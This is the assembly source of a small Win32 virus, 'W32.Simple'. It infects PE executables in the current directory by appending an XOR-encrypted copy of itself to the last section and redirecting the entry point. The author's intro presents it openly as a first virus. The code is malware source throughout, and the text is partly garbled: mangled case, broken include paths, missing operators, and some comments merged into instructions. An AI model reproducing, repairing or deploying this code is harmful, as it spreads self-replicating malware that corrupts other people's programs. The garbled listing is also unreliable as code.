[W32.SIMPLE BY XXXXXX]
; -_-_-_-_-_ _ _ _ _ _ _ _ _ _ _ _-_-_-_-_ _ _ _ _ _ _ _- _-_-_-_-_-_-_-_-_-
This is a very small and simple win32 pe infector .. it infects ONLY
Files in the current directory. This virus is not suposed to be in
The Wild So I don't wandid to include Windir Infection or Directory
Traversel ... i Just Wanted to Write A Small Stabile Win32 Virus :)
There's not much to mention About this exept a few Things: i don't
Use file-mapping, look why bellow. All The Routines Are Not Copied
From Someone else. Coz this is my first win32 Virus I Read a Couple
; Of Tutors But The Thing Is I Tried To Understand Things Instead of
; Just Paste Code. I Tried My Best In Optimizing Common Structure
LIKE INFECTION AND EXPORT-TABLE Scanning. The Encryption is Lame AS
; Fuck ... so ... it's just my first virus don't excect to much :)
; Please write to [xxxxx@gmx.net] xxxxxx
; -_-_-_-_-_ _ _ _ _ _ _ _ _ _ _ _-_-_-_-_ _ _ _ _ _ _ _- _-_-_-_-_-_-_-_-_-
.486
.Model flat, stdcall
Option CaseMAP: NONE
INCLUDE /MASM32/INCLUDE / WANEL32.INC
INCLUDELIB /MASM32/LIB/kernel32.lib
Virus_size EQU Virus_END - Virus_Start
Max_path EQU 104H
Of_read equ 000h
GHND EQU 002H OR 040H
FILE_ATTRIBUTE_NORMAL EQU 080H
.Code
First_gen:
PUSH 0
Call EXITPROCESS
Virus_Start:
Pushhad
Call delta
Delta: POP EBP
Sub EBP, Delta; EBP = DELTA OFFSET
XOR_KEY: MOV DH, 0; WILL BE PATCHED ...
Lea ESI, [EBP E_START]; SO NO XOR EDX, EDX :)
PUSH ESI
MOV ECX, Virus_END - E_START
; _________________ _ _ _ [-Encrypt-] _ _ _ __
Encrypt: XOR BYTE PTR [ESI], DH; EN / DE-CRYPTS THE VIRUS_BDY
ROL DH, 1; Very Lame I Know ...
Inc ESI
Dec ECX
JNZ ENCRYPT
RET
E_START: CALL GET_KERNEL; GET KERNEL BASEMOV ECX, 14
Lea ESI, [EBP ___kernel32]
Call get_apis; get kernel API's
Call Infect_Dir; Infect Some Files
ERR_EXT: POPAD
Hreturn: Push DWORD PTR Offset First_gen; Return to Host
Ret; Will BE PATCHED LATER
; _________________ _ _ _ [-Get_kernel-] _ _ _ __
GET_KERNEL:; Returns the Kernel Base
MOV ECX, [ESP 9 * 4]; Simple But Small :)
@@: DEC ECX
Movzx EDX, Word PTR [ECX 03CH]; EDX = Pointer to PE_HDR
CMP ECX, [ECX EDX 034H]; Compare Current Base with
JNZ @B; The Kernel Image_Base (MZ)
MOV [EBP _KERNEL], ECX; Store Result
MOV [EBP _DEFAULT], ECX
RET
; ____________________ [-get_apis-] _ _ _ __
GET_APIS:; Scans Throught API Table
INC ESI; and RETURNS Addresses
Push ECX
Call get_api; search API Address
POP ECX
Movzx EBX, Byte Ptr [ESI - 1]
Add ESI, EBX; Store Address in The
MOV [ESI], Eax; API Table ...
Add ESI, 4
Loop get_apis; Next One
RET
; _________________ _ _ _ [-gET_API-] _ _ _ __
GET_API:; Scans for a Single API ADR
MOV EDX, [EBP _DEFAULT]; EDX = Default Module Base
Add Edx, [EDX 03CH]; Offset PE_HEADER
MOV EDX, [EDX 078H]; EDX = PTR EXPORT_DIR RVA
Add Edx, [EBP _DEFAULT]; BASE
MOV EDI, [EDX 020H]; EDI = PTR Address_of_names RVA
Add Edi, [EBP _DEFAULT]; BASE
MOV EDI, [EDI]; EDI = PTR ADR_OF_NAMES RVA
Add Edi, [EBP _DEFAULT]; BASE
MOV Eax, [EDX 018H]; EAX = Number_Of_Names
XOR EBX, EBX
NXT_ONE: INC EBX
Movzx ECX, Byte Ptr [ESI - 1]; LengHT of Spezifed API Name
PUSH ESI
Push EDI
Repz Cmpsb; Compare API Name with
POP EDI; Export EntryPoP ESI
JZ Found
Push EAX
XOR Al, Al
ScaSB; Get Next One
JNZ $ - 1
POP EAX
Dec EAX; Decrease Number_of_names
JZ Err_ext
JMP NXT_ONE
Found: MOV ECX, [EDX 024H]; ECX = PTR NBR_NAME_ORDS RVA
Add ECX, [EBP _DEFAULT]; BASE
Dec EBX
Movzx Eax, Word PTR [ECX EBX * 2]; EAX = Ordinal Of Function
MOV EBX, [EDX 01CH]; EBX = PTR ADR_OF_FUNCTIONS RVA
Add EBX, [EBP _DEFAULT]; BASE
MOV EAX, [EBX EAX * 4]; EAX = Function RVA !!!!
Add Eax, [EBP _DEFAULT]; BASE
RET
; _________________ _ _ _ [-infect_directory-] _ _ ___
Infect_dir:; Search All Executables in
Lea Eax, [EBP W32Finddata]; The Spezifed Directory
Push EAX
Lea Eax, [EBP File_Mask]
Push EAX
Call [EBP _FINDFIRSTFILE]
INC EAX
JZ _S_OUT
Dec EAX
MOV [EBP S_HANDLE], EAX
_S_scan:
CMP [EBP FileSizeh], 0; ONLY FILES Under 4GIGS ...
JNZ _next
Call infect_file; pefact so infect it!
_Next:
Lea Eax, [EBP W32FindData]
Push EAX
Push [EBP S_HANDLE]
Call [EBP _FINDNEXTFILE]
Test Eax, EAX
JNZ _S_SCAN
_S_close:
Push [EBP S_HANDLE]
Call [EBP _FINDCLOSE]
_S_OUT: RET
; _________________ _ _ _ [-Open_File-] _ _ _ __
Infect_file:; Opens a File And Allocate MEM
Push file_attribute_normal; I don't use filemapping coz
Lea Eax, [EBP FileName]; I Simply Hate ... Imagine
Push Eax; You Map A File and Begin To
Call [EBP _SETFILEATTRIBUTES]; make the first changes, now
You realize the pe is not
Push of_read; valid or corrupted (Packed
Lea Eax, [EBP FileName]; Files or Some MS PE's
Push Eax; [Outlook]) ... this pe shopCall [EBP __LOPEN]; beh history now :) i buy it
MOV [EBP FILEHANDLE], EAX; Before and Must Say That
MOV EAX, [EBP FileSize]; I Had Tons of Problems with
Add [EBP MAPSIZE], EAX; THIS TECHNIQUE ...
Push [EBP MAPSIZE]
Push Ghnd
Call [EBP _GLOBALLOC]
MOV [EBP H_Buffer], EAX
Push EAX
Call [EBP _GLOBALLOCK]; Allocate Mem for the File
Test Eax, Eax; Virus_Body
JZ _exit
MOV [EBP M_BUFFER], EAX
Push [EBP FileSize]
Push [EBP M_Buffer]
Push [EBP FILEHANDLE]
Call [EBP __LREAD]; Read Entire File to Buffer
Push [EBP FILEHANDLE]
Call [EBP __LCLOSE]
; ____________________ [-infect_file-] _ _ ___
MOV EDI, [EBP M_Buffer]; EDI = Pointer to Mem Block
CMP Word PTR [EDI], "ZM"; Do Some Checks (MZ / PE / Infmark)
Jnz _exit
Add Edi, [EDI 03CH]; EDI = Pointer to PE_HDR
CMP Word PTR [EDI], "EP"
Jnz _exit
CMP DWORD PTR [EDI 04CH], 0
Jnz _exit
RETURN LAST Section
MOV ECX, [EDI 074H]; ECX = Number_Of_rva_and_sizes
LEA ECX, [ECX * 8 EDI]; x 8 offset pe_header
Movzx Eax, Word PTR [EDI 006H]; EAX = Number_Of_sections
Dec Eax; - 1
Lea EBX, [EAX EAX * 4]; EBX = EAX X 28H
Lea EBX, [EBX * 8]; ...
Lea EBX, [EBX ECX 078H]; EBX = EBX ECX 078H
MOV EAX, Virus_Size
XADD [EBX 008H], EAX; Change Virtualsize
CMP EAX, [EBX 010H]
Ja _exit
Push EAX
Push DWORD PTR [EBX 010H]
Add Eax, Virus_size
XOR EDX, EDX
MOV ECX, [EDI 03CH]
Div ECX
INC EAX
Imul Eax, ECX
MOV [EBX 010H], EAX; Change Size_OF_RAW_DATAPOP ECX
Mov Eax, [EBX 010H]
Sub Eax, Ecx; Change Size_OF_IMAGE
Add [EDI 050H], EAX
Change Attribs & Infmark
OR DWORD PTR [EBX 024H], 0C0000000H
MOV DWORD PTR [EDI 04CH], 'BDHP'
POP EAX
Add Eax, [EBX 00CH]
XCHG [EDI 028H], EAX; Change Entry_Point
Add Eax, [EDI 034H]
MOV EDI, [EBX 014H]; Virus_POS = Virt_ADR
Add Edi, [EBX 008H]; Virt_size
MOV ECX, Virus_Size
Sub EDI, ECX
Add Edi, [EBP M_Buffer]
Lea ESI, [EBP VIRUS_START]
Rep Movsb; Write Virus_Body To Buffer
; _________________ _ _ _ [-close_File-] _ _ _ __
Add Byte PTR [EBP XOR_KEY 1], 10
MOV DH, BYTE PTR [EBP XOR_KEY 1]
MOV BYTE PTR [EDI - (Virus_END - XOR_KEY) 1], DH
MOV [EDI - (Virus_END - HRETURN) 1], EAX
Lea ESI, [EDI - (Virus_end - E_START)]
MOV ECX, Virus_END - E_START
Call Encrypt; Encrypt Virus_Body
Push 0; truncate file andoke
Lea Eax, [EBP FileName]; File for Write Access
Push Eax; (File Attribs Are Set Above)
Call [EBP __LCREAT]
INC EAX
JZ _exit
MOV EAX, [EBX 014H]; filesize = virt_adr
Add Eax, [EBX 010H]; SIZE_OF_RAW_DATA
Push EAX
Push [EBP M_Buffer]; Write Buffer To File ...
Push [EBP FILEHANDLE]; Close File ...
Call [EBP __LWRITE]; Get Rid of Those Memory
Push [EBP FILEHANDLE]; POINTERS AND FREE MEMORY ...
Call [EBP __LCLOSE]; SET OLD File Attributes
_Exit: push [EBP M_Buffer]
Call [EBP _GLOBALUNLOCK]
Push [EBP H_Buffer]
Call [EBP _GLOBALFREE]
Push [EBP F_OATITRIBS]
Lea EAX, [EBP FileName]
Push EAX
Call [EBP _SETFILEATTRIBUTES]
RET
; _________________ _ _ _ [-virus_Data-] _ _ _ __
___Kernel32:;
DB 06, "_ lopen"; API TABLE
__Lopen DD 0; Will BE Filled Up with ADR'S
DB 06, "_ loread"; from a spezifed module-export
__Lread DD 0; Table (in this case kernel32)
DB 07, "_ lwrite"
__LWRITE DD 0
DB 07, "_ lclose"
__Lclose DD 0
DB 07, "_ lcreat"
__Lcreat DD 0
DB 11, "GLOBALLOC"
_GlobalAlloc DD 0
DB 10, "GLOBALLOCK"
_Globalock DD 0
DB 12, "GlobalUnlock"
_Globalunlock DD 0
DB 10, "GlobalFree"
_GlobalFree DD 0
DB 13, "findfirstfile"
_Findfirstfile dd 0
DB 12, "findnextfile"
_FindNextFile DD 0
DB 09, "FindClose"
_FindClose DD 0
DB 17, "SetFileAttributes"
_SetFileAttributes DD 0
DB 17, "getFileAttributes"
_GetfileAttributes DD 0
_Kernel DD 0; Base Placeholders
_Default DD 0
Mapize DD Virus_size 1000H
FileHandle DD 0
H_Buffer DD 0
M_Buffer DD 0
W32FindData:; Win32_Find_Data Struc
F_oattribs DD 0
DD 6 DUP (0)
FileSizeh DD 0
FILSIZE DD 0
DD 2 DUP (0)
FileName DB Max_Path Dup (0)
DB 14 DUP (0)
S_handle DD 0
FILE_MASK DB "* .exe", 0
Virus_end:
END VIRUS_START
